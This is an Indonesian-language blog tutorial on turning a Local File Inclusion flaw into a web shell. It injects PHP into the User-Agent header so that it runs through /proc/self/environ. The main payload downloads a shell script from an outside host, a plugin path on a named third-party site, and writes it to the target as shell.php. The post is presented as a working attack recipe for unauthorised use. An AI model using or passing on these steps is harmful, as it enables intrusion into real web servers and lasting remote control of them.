Persiapan :
1. target vuln LFI
2. mozilla.
3. "addon live http header" anda bisa mendownloadnya di sini
https://addons.mozilla.org/en/firefox/addon/live-http-headers/
4. mild + segelas susu hangat.... ^_^
pertama2 temukan dulu file /proc/self/environ jika udah ketemu kurang-lebih tampilannya seperti ini...
setelah ketemu... buka addons "Live HTTP Header" centang capture kemudian reload halaman tadi...
kemudian klik HTTP Header lalu klik replay... pada bagian user agent ganti dengan script php <? echo"hallllo....!" ?> untuk mengetes apakah bisa mengeksekusi perintah php... kemudian klik replay...
Lihat pada bagian HTTP_USER_AGENT terdapat string "hallllo....!" yang berarti script kita tadi ter eksekusi... sekarang kita tinggal ulangi langkah2 di atas tapi php scriptnya kita ganti seperti ini...
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.iidaharju.com/wp-content/plugins/akismet/tet.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
script di atas untuk membuat file shell.php yang isinya saya ambil dari sini http://www.iidaharju.com/wp-content/plugins/akismet/tet.txt
kemudian klik reply... lalu buka shell.php di tempat yang sama dengan filetarget yang vuln dengan LFI tadi dan TARRA.... shell telah terupload... ^_^
No comments:
Post a Comment